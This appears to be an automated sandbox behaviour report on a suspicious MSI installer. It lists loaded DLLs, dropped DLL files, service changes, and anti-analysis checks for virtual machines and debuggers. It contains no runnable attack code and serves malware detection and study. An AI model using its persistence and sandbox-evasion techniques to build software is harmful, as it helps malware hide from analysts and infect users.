                      Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
                      Source: ad.msiStatic file information: File size 1619456 > 1048576
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIB6D3.tmp, 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, MSIB6D3.tmp, 00000005.00000000.2105755236.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, ad.msi, 62b2e8.msi.2.dr, MSIB616.tmp.2.dr, MSIB6D3.tmp.2.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB539.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: ad.msi, MSIB1FF.tmp.0.dr, 62b2e8.msi.2.dr, MSIB29F.tmp.0.dr, MSIB539.tmp.2.dr, MSIB22F.tmp.0.dr, MSIB25F.tmp.0.dr, MSIB1DF.tmp.0.dr, MSIB5A8.tmp.2.dr, MSIB151.tmp.0.dr
                      Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIB6D3.tmp, 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, MSIB6D3.tmp, 00000005.00000000.2105755236.0000000000B77000.00000002.00000001.01000000.00000003.sdmp, ad.msi, 62b2e8.msi.2.dr, MSIB616.tmp.2.dr, MSIB6D3.tmp.2.dr
                      Source: Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000003.2111415783.0000026387FC0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000007.00000002.3347746498.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_71a2ec86.dll.6.dr, 360total.dll.2.dr
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,6_2_00000001800033E0
                      Source: Update_71a2ec86.dll.6.drStatic PE information: real checksum: 0xe14a2 should be: 0xe5e2c
                      Source: 360total.dll.2.drStatic PE information: real checksum: 0xe14a2 should be: 0xe5e2c
                      Source: 360total.dll.2.drStatic PE information: section name: yhDm^
                      Source: Update_71a2ec86.dll.6.drStatic PE information: section name: yhDm^
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B5323C push ecx; ret 5_2_00B5324F
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180010451 push rcx; ret 6_2_0000000180010452
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001045A push rcx; ret 6_2_000000018001045B
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018017500F push rdx; iretd 6_2_0000000180175010

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIB6D3.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB151.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeFile created: :wtfbbq (copy)Jump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB1FF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB539.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB25F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB22F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB1DF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5A8.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeFile created: C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIB29F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB6D3.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\sharepoint\360total.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB539.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB5A8.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIB6D3.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,6_2_0000000180062148
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\rundll32.exeCode function: EnterCriticalSection,memset,GetModuleFileNameW,PathAppendW,StrStrIW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleFileNameW,PathAppendW,PathFileExistsW,PathAppendW,PathFileExistsW,memset,SHGetValueW,PathAppendW,PathFileExistsW,LoadLibraryW,GetProcAddress,GetProcAddress,LeaveCriticalSection,6_2_00000001800655A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,6_2_0000026387CF68E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,6_2_0000026387CF7FA8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,7_2_000002095B8268E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,7_2_000002095B827FA8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,8_2_000002268D6D68E8
                      Source: C:\Windows\System32\rundll32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,8_2_000002268D6D7FA8
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 1004Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 815Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeWindow / User API: threadDelayed 8180Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: :wtfbbq (copy)Jump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB151.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1FF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB539.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB25F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB22F.tmpJump to dropped file
                      Source: C:\Windows\System32\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Custom_update\Update_71a2ec86.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIB5A8.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB1DF.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIB29F.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\sharepoint\360total.dllJump to dropped file
                      Source: C:\Windows\Installer\MSIB6D3.tmpCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-33387
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 1.6 %
                      Source: C:\Windows\System32\rundll32.exeAPI coverage: 8.4 %
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180049AEC6_2_0000000180049AEC
                      Source: C:\Windows\System32\rundll32.exe TID: 6556Thread sleep count: 1004 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 6556Thread sleep time: -1004000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 6636Thread sleep count: 815 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 6636Thread sleep time: -81500s >= -30000sJump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 6556Thread sleep count: 8180 > 30Jump to behavior
                      Source: C:\Windows\System32\rundll32.exe TID: 6556Thread sleep time: -8180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B6AF79 FindFirstFileExW,5_2_00B6AF79
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CFA350 FindFirstFileW,FindNextFileW,LoadLibraryW,6_2_0000026387CFA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000026387CF1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,6_2_0000026387CF1A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B82A350 FindFirstFileW,FindNextFileW,LoadLibraryW,7_2_000002095B82A350
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_000002095B821A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,7_2_000002095B821A08
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6DA350 FindFirstFileW,FindNextFileW,LoadLibraryW,8_2_000002268D6DA350
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_000002268D6D1A08 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,8_2_000002268D6D1A08
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MWrod_VMware_SATA_CD00#4&224f42ef&
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959E88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                      Source: rundll32.exe, 00000007.00000002.3348585444.0000020959F22000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3230609342.0000020959F22000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000007.00000003.3230609342.0000020959EEF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3348585444.0000020959EE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWC
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B3D0A5 IsDebuggerPresent,OutputDebugStringW,5_2_00B3D0A5
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180066C3C memset,GetLastError,IsDebuggerPresent,OutputDebugStringW,6_2_0000000180066C3C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,6_2_00000001800033E0
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B62DCC mov ecx, dword ptr fs:[00000030h]5_2_00B62DCC
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B6AD78 mov eax, dword ptr fs:[00000030h]5_2_00B6AD78
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B32310 GetProcessHeap,5_2_00B32310
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B533A8
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B5353F SetUnhandledExceptionFilter,5_2_00B5353F
                      Source: C:\Windows\Installer\MSIB6D3.tmpCode function: 5_2_00B52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00B52968
